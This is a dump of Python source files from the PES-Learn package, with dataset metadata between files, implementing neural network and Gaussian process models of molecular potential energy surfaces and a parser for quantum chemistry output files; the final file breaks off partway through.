def set_default_hyperparameters(self, nn_search_space=1):\n \"\"\"\n Set default hyperparameter space. If none is provided, default is used.\n\n Parameters\n ----------\n nn_search_space : int\n Which tier of default hyperparameter search spaces to use. Neural networks have too many hyperparameter configurations to search across, \n so this option reduces the number of variable hyperparameters to search over. 
Generally, larger integer => more hyperparameters, and more iterations of hp_maxit are recommended.\n \"\"\"\n if nn_search_space == 1:\n self.hyperparameter_space = {\n 'scale_X': hp.choice('scale_X',\n [\n {'scale_X': 'mm11',\n 'activation': hp.choice('activ2', ['tanh'])},\n {'scale_X': 'std',\n 'activation': hp.choice('activ3', ['tanh'])},\n ]),\n 'scale_y': hp.choice('scale_y', ['std', 'mm01', 'mm11']),}\n # TODO make more expansive search spaces, benchmark them, expose them as input options\n #elif nn_search_space == 2:\n #elif nn_search_space == 3:\n else:\n raise Exception(\"Invalid search space specification\")\n\n # Standard geometry transformations, always use these.\n if self.input_obj.keywords['pes_format'] == 'interatomics':\n self.set_hyperparameter('morse_transform', hp.choice('morse_transform',[{'morse': True,'morse_alpha': hp.quniform('morse_alpha', 1, 2, 0.1)},{'morse': False}]))\n else:\n self.set_hyperparameter('morse_transform', hp.choice('morse_transform',[{'morse': False}]))\n if self.pip:\n val = hp.choice('pip',[{'pip': True,'degree_reduction': hp.choice('degree_reduction', [True,False])}])\n self.set_hyperparameter('pip', val)\n else:\n self.set_hyperparameter('pip', hp.choice('pip', [{'pip': False}]))\n\n def optimize_model(self):\n if not self.input_obj.keywords['validation_points']:\n print(\"Number of validation points not specified. Splitting test set in half --> 50% test, 50% validation\")\n print(\"Training with {} points. Validating with {} points. Full dataset contains {} points.\".format(self.ntrain, self.nvalid, self.n_datapoints))\n print(\"Using {} training set point sampling.\".format(self.sampler))\n print(\"Errors are root-mean-square error in wavenumbers (cm-1)\")\n print(\"\\nPerforming neural architecture search...\\n\")\n best_hlayers = self.neural_architecture_search(trial_layers = self.trial_layers)\n print(\"\\nNeural architecture search complete. 
Best hidden layer structures: {}\\n\".format(best_hlayers))\n print(\"Beginning hyperparameter optimization...\")\n print(\"Trying {} combinations of hyperparameters\".format(self.hp_maxit))\n self.set_hyperparameter('layers', hp.choice('layers', best_hlayers))\n self.hyperopt_trials = Trials()\n self.itercount = 1\n if self.input_obj.keywords['rseed']:\n rstate = np.random.RandomState(self.input_obj.keywords['rseed'])\n else:\n rstate = None\n best = fmin(self.hyperopt_model,\n space=self.hyperparameter_space,\n algo=tpe.suggest,\n max_evals=self.hp_maxit*2,\n rstate=rstate, \n show_progressbar=False,\n trials=self.hyperopt_trials)\n hyperopt_complete()\n print(\"Best performing hyperparameters are:\")\n final = space_eval(self.hyperparameter_space, best)\n print(str(sorted(final.items())))\n self.optimal_hyperparameters = dict(final)\n print(\"Optimizing learning rate...\")\n \n if self.input_obj.keywords['nn_precision'] == 64:\n precision = 64\n elif self.input_obj.keywords['nn_precision'] == 32:\n precision = 32\n else: \n precision = 32\n learning_rates = [1.0, 0.8, 0.6, 0.5, 0.4, 0.2]\n val_errors = []\n for i in learning_rates:\n self.optimal_hyperparameters['lr'] = i\n test_error, val_error = self.build_model(self.optimal_hyperparameters, maxit=5000, val_freq=10, es_patience=5, opt='lbfgs', tol=0.5, decay=False, verbose=False, precision=precision)\n val_errors.append(val_error)\n best_lr = learning_rates[np.argsort(val_errors)[0]]\n self.optimal_hyperparameters['lr'] = best_lr\n print(\"Fine-tuning final model...\")\n model, test_error, val_error, full_error = self.build_model(self.optimal_hyperparameters, maxit=5000, val_freq=1, es_patience=100, opt='lbfgs', tol=0.1, decay=True, verbose=True,precision=precision,return_model=True)\n performance = [test_error, val_error, full_error]\n print(\"Model optimization complete. Saving final model...\")\n self.save_model(self.optimal_hyperparameters, model, performance)\n\n def neural_architecture_search(self, trial_layers=None):\n \"\"\"\n Finds 'optimal' hidden layer structure. (i.e., tries both wide and deep homogenous hidden layer structures and finds the best 3 for follow-up hyperparameter optimization)\n \n Parameters\n ----------\n trial_layers : list\n A list of tuples describing the number of nodes in each hidden layer. 
Example: a 3-20-20-1 NN would be a tuple (20,20).\n \"\"\"\n if trial_layers == None:\n tmp_layers = [(16,), (16,16), (16,16,16), (16,16,16,16),\n (32,), (32,32), (32,32,32), (32,32,32,32),\n (64,), (64,64), (64,64,64), (64,64,64,64),\n (128,), (128,128), (128,128,128),\n (256,), (256,256)] \n else:\n tmp_layers = trial_layers\n self.nas_layers = sort_architectures(tmp_layers, self.inp_dim)\n self.nas_size = len(self.nas_layers)\n # force reliable set of hyperparameters\n params = {'morse_transform': {'morse':False},'scale_X':{'scale_X':'std', 'activation':'tanh'}, 'scale_y':'std'}\n if self.pip:\n params['pip'] = {'degree_reduction': False, 'pip': True} \n else:\n params['pip'] = {'degree_reduction': False, 'pip': False} \n test = []\n validation = []\n for i in self.nas_layers:\n params['layers'] = i\n print(\"Hidden layer structure: \", i)\n testerror, valid = self.build_model(params, maxit=300, val_freq=10, es_patience=2, opt='lbfgs', tol=1.0, decay=False, verbose=False)\n test.append(testerror)\n validation.append(valid)\n # save best architectures for hyperparameter optimization\n indices = np.argsort(test)\n best_hlayers = [self.nas_layers[i] for i in indices[:3]]\n return best_hlayers\n\n def split_train_test(self, params, validation_size=None, precision=32):\n \"\"\"\n Take raw dataset and apply hyperparameters/input keywords/preprocessing\n and train/test (tr,test) splitting.\n Assigns:\n self.X : complete input data, transformed\n self.y : complete output data, transformed\n self.Xscaler : scaling transformer for inputs \n self.yscaler : scaling transformer for outputs \n self.Xtr : training input data, transformed\n self.ytr : training output data, transformed\n self.Xtest : test input data, transformed\n self.ytest : test output data, transformed\n self.Xvalid : validation input data, transformed\n self.yvalid : validation output data, transformed\n \"\"\"\n self.X, self.y, self.Xscaler, self.yscaler = self.preprocess(params, self.raw_X, self.raw_y)\n if self.sampler == 'user_supplied':\n self.Xtr = self.transform_new_X(self.raw_Xtr, params, self.Xscaler)\n self.ytr = self.transform_new_y(self.raw_ytr, self.yscaler)\n self.Xtest = self.transform_new_X(self.raw_Xtest, params, self.Xscaler)\n self.ytest = self.transform_new_y(self.raw_ytest, self.yscaler)\n if self.valid_path:\n self.Xvalid = self.transform_new_X(self.raw_Xvalid, params, self.Xscaler)\n self.yvalid = self.transform_new_y(self.raw_yvalid, self.yscaler)\n else:\n raise Exception(\"Please provide a validation set for Neural Network training.\")\n else:\n self.Xtr = self.X[self.train_indices]\n self.ytr = self.y[self.train_indices]\n #TODO: this is splitting validation data in the same way at every model build, not necessary.\n self.valid_indices, self.new_test_indices = train_test_split(self.test_indices, train_size = validation_size, random_state=42)\n if validation_size:\n self.Xvalid = self.X[self.valid_indices] \n self.yvalid = self.y[self.valid_indices]\n self.Xtest = self.X[self.new_test_indices]\n self.ytest = self.y[self.new_test_indices]\n\n #self.Xtmp = self.X[self.test_indices]\n #self.ytmp = self.y[self.test_indices]\n #if validation_size:\n # self.Xvalid, self.Xtest, self.yvalid, self.ytest = train_test_split(self.Xtmp,\n # self.ytmp, \n # train_size = validation_size, \n # random_state=42)\n\n ## temporary implementation: structure based validation set sample\n #if validation_size:\n # data = np.hstack((self.Xtmp, self.ytmp))\n # col = [str(i) for i in range(data.shape[1])]\n # col[-1] = 'E'\n # df = 
pd.DataFrame(data, columns=col)\n # df.columns.values[-1] = 'E'\n # sample = DataSampler(df, validation_size)\n # sample.structure_based()\n # validation_indices, test_indices = sample.get_indices()\n # self.Xvalid = self.Xtmp[validation_indices]\n # self.yvalid = self.ytmp[validation_indices]\n # self.Xtest = self.Xtmp[test_indices]\n # self.ytest = self.ytmp[test_indices]\n else:\n raise Exception(\"Please specify a validation set size for Neural Network training.\")\n\n # convert to Torch Tensors\n if precision == 32:\n self.Xtr = torch.tensor(self.Xtr, dtype=torch.float32)\n self.ytr = torch.tensor(self.ytr, dtype=torch.float32)\n self.Xtest = torch.tensor(self.Xtest, dtype=torch.float32)\n self.ytest = torch.tensor(self.ytest, dtype=torch.float32)\n self.Xvalid = torch.tensor(self.Xvalid,dtype=torch.float32)\n self.yvalid = torch.tensor(self.yvalid,dtype=torch.float32)\n self.X = torch.tensor(self.X,dtype=torch.float32)\n self.y = torch.tensor(self.y,dtype=torch.float32)\n elif precision == 64:\n self.Xtr = torch.tensor(self.Xtr, dtype=torch.float64)\n self.ytr = torch.tensor(self.ytr, dtype=torch.float64)\n self.Xtest = torch.tensor(self.Xtest, dtype=torch.float64)\n self.ytest = torch.tensor(self.ytest, dtype=torch.float64)\n self.Xvalid = torch.tensor(self.Xvalid,dtype=torch.float64)\n self.yvalid = torch.tensor(self.yvalid,dtype=torch.float64)\n self.X = torch.tensor(self.X,dtype=torch.float64)\n self.y = torch.tensor(self.y,dtype=torch.float64)\n else:\n raise Exception(\"Invalid option for 'precision'\")\n\n def get_optimizer(self, opt_type, mdata, lr=0.1): \n rate = lr\n if opt_type == 'lbfgs':\n #optimizer = torch.optim.LBFGS(mdata, lr=rate, max_iter=20, max_eval=None, tolerance_grad=1e-5, tolerance_change=1e-9, history_size=100) # Defaults\n #optimizer = torch.optim.LBFGS(mdata, lr=rate, max_iter=100, max_eval=None, tolerance_grad=1e-10, tolerance_change=1e-14, history_size=200)\n optimizer = torch.optim.LBFGS(mdata, lr=rate, max_iter=20, max_eval=None, tolerance_grad=1e-8, tolerance_change=1e-12, history_size=100)\n if opt_type == 'adam':\n optimizer = torch.optim.Adam(mdata, lr=rate)\n return optimizer\n\n def build_model(self, params, maxit=1000, val_freq=10, es_patience=2, opt='lbfgs', tol=1.0, decay=False, verbose=False, precision=32, return_model=False):\n \"\"\"\n Parameters\n ----------\n params : dict\n Hyperparameter dictionary\n maxit : int\n Maximum number of epochs\n val_freq : int\n Validation frequency: Compute error on validation set every 'val_freq' epochs \n es_patience : int\n Early stopping patience. 
How many validations to do before giving up training this model according to tolerance 'tol'\n tol : float\n Tolerance for early stopping in wavenumbers cm^-1: if validation set error \n does not improve by this quantity after waiting for 'es_patience' validation cycles, halt training\n decay : bool\n If True, reduce the learning rate if validation error plateaus\n verbose : bool\n If true, print training progress after every validation \n \"\"\"\n print(\"Hyperparameters: \", params)\n self.split_train_test(params, validation_size=self.nvalid, precision=precision) # split data, according to scaling hp's\n scale = params['scale_y'] # Find descaling factor to convert loss to original energy units\n if scale == 'std':\n loss_descaler = self.yscaler.var_[0]\n if scale.startswith('mm'):\n loss_descaler = (1/self.yscaler.scale_[0]**2)\n\n activation = params['scale_X']['activation']\n if activation == 'tanh':\n activ = nn.Tanh() \n if activation == 'sigmoid':\n activ = nn.Sigmoid()\n \n inp_dim = self.inp_dim\n l = params['layers']\n torch.manual_seed(0)\n depth = len(l)\n structure = OrderedDict([('input', nn.Linear(inp_dim, l[0])),\n ('activ_in' , activ)])\n model = nn.Sequential(structure)\n for i in range(depth-1):\n model.add_module('layer' + str(i), nn.Linear(l[i], l[i+1]))\n model.add_module('activ' + str(i), activ)\n model.add_module('output', nn.Linear(l[depth-1], 1))\n if precision == 64: # cast model to proper precision\n model = model.double() \n\n metric = torch.nn.MSELoss()\n # Define optimizer\n if 'lr' in params:\n lr = params['lr']\n elif opt == 'lbfgs':\n lr = 0.5\n else:\n lr = 0.1\n optimizer = self.get_optimizer(opt, model.parameters(), lr=lr)\n # Define update variables for early stopping, decay, gradient explosion handling\n prev_loss = 1.0\n es_tracker = 0\n best_val_error = None\n failures = 0\n decay_attempts = 0\n prev_best = None\n decay_start = False\n \n for epoch in range(1,maxit):\n def closure():\n optimizer.zero_grad()\n y_pred = model(self.Xtr)\n loss = torch.sqrt(metric(y_pred, self.ytr)) # passing RMSE instead of MSE improves precision IMMENSELY\n loss.backward()\n return loss\n optimizer.step(closure)\n # validate\n if epoch % val_freq == 0:\n with torch.no_grad():\n tmp_pred = model(self.Xvalid) \n tmp_loss = metric(tmp_pred, self.yvalid)\n val_error_rmse = np.sqrt(tmp_loss.item() * loss_descaler) * hartree2cm # loss_descaler converts MSE in scaled data domain to MSE in unscaled data domain\n if best_val_error:\n if val_error_rmse < best_val_error:\n prev_best = best_val_error * 1.0\n best_val_error = val_error_rmse * 1.0 \n else:\n record = True\n best_val_error = val_error_rmse * 1.0 \n prev_best = best_val_error\n if verbose:\n print(\"Epoch {} Validation RMSE (cm-1): {:5.3f}\".format(epoch, val_error_rmse))\n if decay_start:\n scheduler.step(val_error_rmse)\n\n # Early Stopping \n if epoch > 5:\n # if current validation error is not the best (current - best > 0) and is within tol of previous error, the model is stagnant. \n if ((val_error_rmse - prev_loss) < tol) and (val_error_rmse - best_val_error) > 0.0: \n es_tracker += 1\n # else if: current validation error is not the best (current - best > 0) and is greater than the best by tol, the model is overfitting. 
Bad epoch.\n elif ((val_error_rmse - best_val_error) > tol) and (val_error_rmse - best_val_error) > 0.0: \n es_tracker += 1\n # else if: if the current validation error is a new record, but not significant, the model is stagnant\n elif (prev_best - best_val_error) < 0.001:\n es_tracker += 1\n # else: model set a new record validation error. Reset early stopping tracker\n else:\n es_tracker = 0\n #TODO this framework does not detect oscillatory behavior about 'tol', though this has not been observed to occur in any case \n # Check status of early stopping tracker. First try decaying to see if stagnation can be resolved, if not then terminate training\n if es_tracker > es_patience:\n if decay: # if decay is set to true, if early stopping criteria is triggered, begin LR scheduler and go back to previous model state and attempt LR decay.\n if decay_attempts < 1:\n decay_attempts += 1\n es_tracker = 0\n if verbose:\n print(\"Performance plateau detected. Reverting model state and decaying learning rate.\")\n decay_start = True\n thresh = (0.1 / np.sqrt(loss_descaler)) / hartree2cm # threshold is 0.1 wavenumbers\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=0.9, threshold=thresh, threshold_mode='abs', min_lr=0.05, cooldown=2, patience=10, verbose=verbose)\n model.load_state_dict(saved_model_state_dict)\n saved_optimizer_state_dict['param_groups'][0]['lr'] = lr*0.9\n optimizer.load_state_dict(saved_optimizer_state_dict)\n # Since learning rate is decayed, override tolerance, patience, validation frequency for high-precision\n #tol = 0.05\n #es_patience = 100\n #val_freq = 1\n continue\n else:\n prev_loss = val_error_rmse * 1.0\n if verbose:\n print('Early stopping termination')\n break\n else:\n prev_loss = val_error_rmse * 1.0\n if verbose:\n print('Early stopping termination')\n break\n\n # Handle exploding gradients \n if epoch > 10:\n if (val_error_rmse > prev_loss*10): # detect large increases in loss\n if epoch > 60: # distinguish between exploding gradients at near converged models and early on exploding grads\n if verbose:\n print(\"Exploding gradient detected. 
Resuming previous model state and decaying learning rate\")\n model.load_state_dict(saved_model_state_dict)\n saved_optimizer_state_dict['param_groups'][0]['lr'] = lr*0.5\n optimizer.load_state_dict(saved_optimizer_state_dict)\n failures += 1 # if \n if failures > 2: \n break\n else:\n continue\n else:\n break\n if val_error_rmse != val_error_rmse: # detect NaN \n break\n if ((prev_loss < 1.0) and (precision == 32)): # if 32 bit precision and model is giving very high accuracy, kill so the accuracy does not go beyond 32 bit precision\n break\n prev_loss = val_error_rmse * 1.0 # save previous loss to track improvement\n\n # Periodically save model state so we can reset under instability/overfitting/performance plateau\n if epoch % 50 == 0:\n saved_model_state_dict = copy.deepcopy(model.state_dict())\n saved_optimizer_state_dict = copy.deepcopy(optimizer.state_dict())\n \n with torch.no_grad():\n test_pred = model(self.Xtest)\n test_loss = metric(test_pred, self.ytest)\n test_error_rmse = np.sqrt(test_loss.item() * loss_descaler) * hartree2cm \n val_pred = model(self.Xvalid) \n val_loss = metric(val_pred, self.yvalid)\n val_error_rmse = np.sqrt(val_loss.item() * loss_descaler) * hartree2cm\n full_pred = model(self.X)\n full_loss = metric(full_pred, self.y)\n full_error_rmse = np.sqrt(full_loss.item() * loss_descaler) * hartree2cm\n print(\"Test set RMSE (cm-1): {:5.2f} Validation set RMSE (cm-1): {:5.2f} Full dataset RMSE (cm-1): {:5.2f}\".format(test_error_rmse, val_error_rmse, full_error_rmse))\n if return_model:\n return model, test_error_rmse, val_error_rmse, full_error_rmse \n else:\n return test_error_rmse, val_error_rmse\n\n def hyperopt_model(self, params):\n \"\"\"\n A Hyperopt-friendly wrapper for build_model\n \"\"\"\n # skip building this model if hyperparameter combination already attempted\n for i in self.hyperopt_trials.results:\n if 'memo' in i:\n if params == i['memo']:\n return {'loss': i['loss'], 'status': STATUS_OK, 'memo': 'repeat'}\n if self.itercount > self.hp_maxit:\n return {'loss': 0.0, 'status': STATUS_FAIL, 'memo': 'max iters reached'}\n error_test, error_valid = self.build_model(params)\n self.itercount += 1\n if np.isnan(error_valid):\n return {'loss': 1e5, 'status': STATUS_FAIL, 'memo': 'nan'}\n else:\n return {'loss': error_valid, 'status': STATUS_OK, 'memo': params}\n\n def preprocess(self, params, raw_X, raw_y):\n \"\"\"\n Preprocess raw data according to hyperparameters\n \"\"\"\n if params['morse_transform']['morse']:\n raw_X = morse(raw_X, params['morse_transform']['morse_alpha'])\n if params['pip']['pip']:\n # find path to fundamental invariants form molecule type AxByCz...\n path = os.path.join(package_directory, \"lib\", self.molecule_type, \"output\")\n raw_X, degrees = interatomics_to_fundinvar(raw_X,path)\n if params['pip']['degree_reduction']:\n raw_X = degree_reduce(raw_X, degrees)\n if params['scale_X']:\n X, Xscaler = general_scaler(params['scale_X']['scale_X'], raw_X)\n else:\n X = raw_X\n Xscaler = None\n if params['scale_y']:\n y, yscaler = general_scaler(params['scale_y'], raw_y)\n else:\n y = raw_y\n yscaler = None\n return X, y, Xscaler, yscaler\n\n def save_model(self, params, model, performance):\n print(\"Saving ML model data...\") \n model_path = \"model1_data\"\n while os.path.isdir(model_path):\n new = int(re.findall(\"\\d+\", model_path)[0]) + 1\n model_path = re.sub(\"\\d+\",str(new), model_path)\n os.mkdir(model_path)\n os.chdir(model_path)\n torch.save(model, 'model.pt')\n \n with open('hyperparameters', 'w') as f:\n 
print(params, file=f)\n\n test, valid, full = performance\n with open('performance', 'w') as f:\n print(\"Test set RMSE (cm-1): {:5.2f} Validation set RMSE (cm-1): {:5.2f} Full dataset RMSE (cm-1): {:5.2f}\".format(test, valid, full), file=f)\n \n if self.sampler == 'user_supplied':\n self.traindata.to_csv('train_set',sep=',',index=False,float_format='%12.12f')\n self.validdata.to_csv('validation_set',sep=',',index=False,float_format='%12.12f')\n self.testdata.to_csv('test_set', sep=',', index=False, float_format='%12.12f')\n else:\n self.dataset.iloc[self.train_indices].to_csv('train_set',sep=',',index=False,float_format='%12.12f')\n self.dataset.iloc[self.valid_indices].to_csv('validation_set', sep=',', index=False, float_format='%12.12f')\n self.dataset.iloc[self.new_test_indices].to_csv('test_set', sep=',', index=False, float_format='%12.12f')\n \n self.dataset.to_csv('PES.dat', sep=',',index=False,float_format='%12.12f')\n with open('compute_energy.py', 'w+') as f:\n print(self.write_convenience_function(), file=f)\n os.chdir(\"../\")\n\n def transform_new_X(self, newX, params, Xscaler=None):\n \"\"\"\n Transform a new, raw input according to the model's transformation procedure \n so that prediction can be made.\n \"\"\"\n # ensure X dimension is n x m (n new points, m input variables)\n if len(newX.shape) == 1:\n newX = np.expand_dims(newX,0)\n elif len(newX.shape) > 2:\n raise Exception(\"Dimensions of input data is incorrect.\")\n if params['morse_transform']['morse']:\n newX = morse(newX, params['morse_transform']['morse_alpha'])\n if params['pip']['pip']:\n # find path to fundamental invariants for an N atom system with molecule type AxByCz...\n path = os.path.join(package_directory, \"lib\", self.molecule_type, \"output\")\n newX, degrees = interatomics_to_fundinvar(newX,path)\n if params['pip']['degree_reduction']:\n newX = degree_reduce(newX, degrees)\n if Xscaler:\n newX = Xscaler.transform(newX)\n return newX\n\n def transform_new_y(self, newy, yscaler=None): \n if yscaler:\n newy = yscaler.transform(newy)\n return newy\n\n def inverse_transform_new_y(self, newy, yscaler=None): \n if yscaler:\n newy = yscaler.inverse_transform(newy)\n return newy\n\n def write_convenience_function(self):\n string = \"from peslearn.ml import NeuralNetwork\\nfrom peslearn import InputProcessor\\nimport torch\\nimport numpy as np\\nfrom itertools import combinations\\n\\n\"\n if self.pip:\n string += \"nn = NeuralNetwork('PES.dat', InputProcessor(''), molecule_type='{}')\\n\".format(self.molecule_type)\n else:\n string += \"nn = NeuralNetwork('PES.dat', InputProcessor(''))\\n\"\n with open('hyperparameters', 'r') as f:\n hyperparameters = f.read()\n string += \"params = {}\\n\".format(hyperparameters)\n string += \"X, y, Xscaler, yscaler = nn.preprocess(params, nn.raw_X, nn.raw_y)\\n\"\n string += \"model = torch.load('model.pt')\\n\"\n string += nn_convenience_function\n return string\n\n\n\n\n\n\n\n \n \n\n\n\n\n" }, { "alpha_fraction": 0.5845641493797302, "alphanum_fraction": 0.5866444706916809, "avg_line_length": 48.55670166015625, "blob_id": "bdf9d923dec9c31cb9f578c58ca77ee7ae7ad69e", "content_id": "6542e0c0f66ea04c49d68034ef9adc1c2aeffba3", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4807, "license_type": "permissive", "max_line_length": 232, "num_lines": 97, "path": "/peslearn/utils/parsing_helper.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as 
np\nimport os\nimport json\nfrom collections import OrderedDict\nfrom ..datagen.outputfile import OutputFile\n\ndef parse(input_obj, mol): \n # define energy extraction routine based on user keywords\n if input_obj.keywords['energy'] == 'cclib':\n if input_obj.keywords['energy_cclib']: \n def extract_energy(input_obj, output_obj):\n energy = output_obj.extract_energy_with_cclib(input_obj.keywords['energy_cclib'])\n return energy\n #TODO add flag for when cclib fails to parse, currently just outputs a None \n else: \n raise Exception(\"\\n Please indicate which cclib energy to parse; e.g. energy_cclib = 'scfenergies', energy_cclib = 'ccenergies' \")\n \n elif input_obj.keywords['energy'] == 'regex': \n if input_obj.keywords['energy_regex']: \n def extract_energy(input_obj, output_obj):\n energy = output_obj.extract_energy_with_regex(input_obj.keywords['energy_regex'])\n return energy\n else:\n raise Exception(\"\\n energy_regex value not assigned in input. Please add a regular expression which captures the energy value, e.g. energy_regex = 'RHF Final Energy: \\s+(-\\d+\\.\\d+)'\")\n \n # define gradient extraction routine based on user keywords\n if input_obj.keywords['gradient'] == 'cclib':\n def extract_gradient(output_obj):\n gradient = output_obj.extract_cartesian_gradient_with_cclib() \n # not needed, (unless it's None when grad isnt found?)\n #gradient = np.asarray(gradient) \n return gradient\n \n elif input_obj.keywords['gradient'] == 'regex':\n header = input_obj.keywords['gradient_header'] \n footer = input_obj.keywords['gradient_footer'] \n grad_line_regex = input_obj.keywords['gradient_line'] \n if header and footer and grad_line_regex:\n def extract_gradient(output_obj, h=header, f=footer, g=grad_line_regex):\n gradient = output_obj.extract_cartesian_gradient_with_regex(h, f, g)\n #gradient = np.asarray(gradient)\n return gradient\n else:\n raise Exception(\"For regular expression gradient extraction, gradient_header, gradient_footer, and gradient_line string identifiers are required to isolate the cartesian gradient block. See documentation for details\") \n\n # parse original internals or interatomics?\n if input_obj.keywords['pes_format'] == 'zmat':\n data = pd.DataFrame(index=None, columns = mol.unique_geom_parameters)\n geom_path = \"/geom\"\n elif input_obj.keywords['pes_format'] == 'interatomics':\n data = pd.DataFrame(index=None, columns = mol.interatomic_labels)\n geom_path = \"/interatomics\"\n else:\n raise Exception(\"pes_format keyword value invalid. 
Must be 'zmat' or 'interatomics'\")\n\n if input_obj.keywords['energy']: \n data['E'] = ''\n if input_obj.keywords['gradient']: \n ngrad = 3*(mol.n_atoms - mol.n_dummy) \n grad_cols = [\"g%d\" % (i) for i in range(ngrad)]\n for i in grad_cols:\n data[i] = ''\n\n # parse output files \n os.chdir(\"./\" + input_obj.keywords['pes_dir_name'])\n dirs = [i for i in os.listdir(\".\") if os.path.isdir(i) ]\n dirs = sorted(dirs, key=lambda x: int(x))\n for d in dirs: \n #path = d + \"/\" + \"output.dat\" \n path = d + \"/\" + input_obj.keywords['output_name']\n output_obj = OutputFile(path)\n if input_obj.keywords['energy']:\n E = extract_energy(input_obj, output_obj)\n if input_obj.keywords['gradient']:\n G = extract_gradient(output_obj)\n ngrad = 3*(mol.n_atoms - mol.n_dummy) \n grad_cols = [\"g%d\" % (i) for i in range(ngrad)]\n with open(d + geom_path) as f:\n for line in f:\n tmp = json.loads(line, object_pairs_hook=OrderedDict)\n df = pd.DataFrame(data=tmp, index=None, columns=tmp[0].keys())\n df['E'] = E\n if input_obj.keywords['gradient']:\n df2 = pd.DataFrame(data=[G.flatten().tolist()],index=None, columns=grad_cols)\n df = pd.concat([df, df2], axis=1)\n data = data.append(df)\n if input_obj.keywords['pes_redundancy'] == 'true':\n continue\n else:\n break\n os.chdir('../')\n\n if input_obj.keywords['sort_pes'] == 'true': \n data = data.sort_values(\"E\")\n data.to_csv(input_obj.keywords['pes_name'], sep=',', index=False, float_format='%12.12f')\n print(\"Parsed data has been written to {}\".format(input_obj.keywords['pes_name']))\n" }, { "alpha_fraction": 0.6010476350784302, "alphanum_fraction": 0.6065983772277832, "avg_line_length": 48, "blob_id": "9a6dcd8b6c2f1e5a5c8e46e542c4f7ff4abf9669", "content_id": "6d443feb2bb51ebc5e88c9634f91f49f808da645", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12791, "license_type": "permissive", "max_line_length": 202, "num_lines": 261, "path": "/peslearn/ml/gaussian_process.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "import numpy as np\nimport sklearn.metrics\nimport json\nimport os\nimport re\nimport sys\nimport gc\nfrom hyperopt import fmin, tpe, hp, STATUS_OK, STATUS_FAIL, Trials, space_eval\nfrom GPy.models import GPRegression\nfrom GPy.kern import RBF\n\nfrom .model import Model\nfrom ..constants import hartree2cm, package_directory, gp_convenience_function\nfrom ..utils.printing_helper import hyperopt_complete\nfrom ..lib.path import fi_dir\nfrom .data_sampler import DataSampler \nfrom .preprocessing_helper import morse, interatomics_to_fundinvar, degree_reduce, general_scaler\n\nclass GaussianProcess(Model):\n \"\"\"\n Constructs a Gaussian Process Model using GPy\n \"\"\"\n def __init__(self, dataset_path, input_obj, molecule_type=None, molecule=None, train_path=None, test_path=None):\n super().__init__(dataset_path, input_obj, molecule_type, molecule, train_path, test_path)\n self.set_default_hyperparameters()\n \n def set_default_hyperparameters(self):\n \"\"\"\n Set default hyperparameter space. 
If none is provided, default is used.\n \"\"\"\n self.hyperparameter_space = {\n 'scale_X': hp.choice('scale_X', ['std', 'mm01', 'mm11', None]),\n 'scale_y': hp.choice('scale_y', ['std', 'mm01', 'mm11', None]),\n }\n\n if self.input_obj.keywords['pes_format'] == 'interatomics':\n self.set_hyperparameter('morse_transform', hp.choice('morse_transform',[{'morse': True,'morse_alpha': hp.quniform('morse_alpha', 1, 2, 0.1)},{'morse': False}]))\n else:\n self.set_hyperparameter('morse_transform', hp.choice('morse_transform',[{'morse': False}]))\n if self.pip:\n val = hp.choice('pip',[{'pip': True,'degree_reduction': hp.choice('degree_reduction', [True,False])}])\n self.set_hyperparameter('pip', val)\n else:\n self.set_hyperparameter('pip', hp.choice('pip', [{'pip': False}]))\n\n if self.input_obj.keywords['gp_ard'] == 'opt': # auto relevancy determination (independant length scales for each feature)\n self.set_hyperparameter('ARD', hp.choice('ARD', [True,False]))\n #TODO add optional space inclusions, something like: if option: self.hyperparameter_space['newoption'] = hp.choice(..)\n\n def split_train_test(self, params):\n \"\"\"\n Take raw dataset and apply hyperparameters/input keywords/preprocessing\n and train/test (tr,test) splitting.\n Assigns:\n self.X : complete input data, transformed\n self.y : complete output data, transformed\n self.Xscaler : scaling transformer for inputs \n self.yscaler : scaling transformer for outputs \n self.Xtr : training input data, transformed\n self.ytr : training output data, transformed\n self.Xtest : test input data, transformed\n self.ytest : test output data, transformed\n \"\"\"\n self.X, self.y, self.Xscaler, self.yscaler = self.preprocess(params, self.raw_X, self.raw_y)\n if self.sampler == 'user_supplied':\n self.Xtr = self.transform_new_X(self.raw_Xtr, params, self.Xscaler)\n self.ytr = self.transform_new_y(self.raw_ytr, self.yscaler)\n self.Xtest = self.transform_new_X(self.raw_Xtest, params, self.Xscaler)\n self.ytest = self.transform_new_y(self.raw_ytest, self.yscaler)\n \n else:\n self.Xtr = self.X[self.train_indices]\n self.ytr = self.y[self.train_indices]\n self.Xtest = self.X[self.test_indices]\n self.ytest = self.y[self.test_indices]\n\n def build_model(self, params, nrestarts=10, maxit=1000, seed=0):\n print(\"Hyperparameters: \", params)\n self.split_train_test(params)\n np.random.seed(seed) # make GPy deterministic for a given hyperparameter config\n dim = self.X.shape[1]\n if self.input_obj.keywords['gp_ard'] == 'opt':\n ard_val = params['ARD']\n elif self.input_obj.keywords['gp_ard'] == 'true':\n ard_val = True\n else:\n ard_val = False\n kernel = RBF(dim, ARD=ard_val) # TODO add HP control of kernel\n self.model = GPRegression(self.Xtr, self.ytr, kernel=kernel, normalizer=False)\n self.model.optimize_restarts(nrestarts, optimizer=\"lbfgsb\", robust=True, verbose=False, max_iters=maxit, messages=False)\n gc.collect(2) #fixes some memory leak issues with certain BLAS configs\n\n def hyperopt_model(self, params):\n # skip building this model if hyperparameter combination already attempted\n for i in self.hyperopt_trials.results:\n if 'memo' in i:\n if params == i['memo']:\n return {'loss': i['loss'], 'status': STATUS_OK, 'memo': 'repeat'}\n if self.itercount > self.hp_maxit:\n return {'loss': 0.0, 'status': STATUS_FAIL, 'memo': 'max iters reached'}\n self.build_model(params)\n error_test = self.vet_model(self.model)\n self.itercount += 1\n return {'loss': error_test, 'status': STATUS_OK, 'memo': params}\n\n def predict(self, model, 
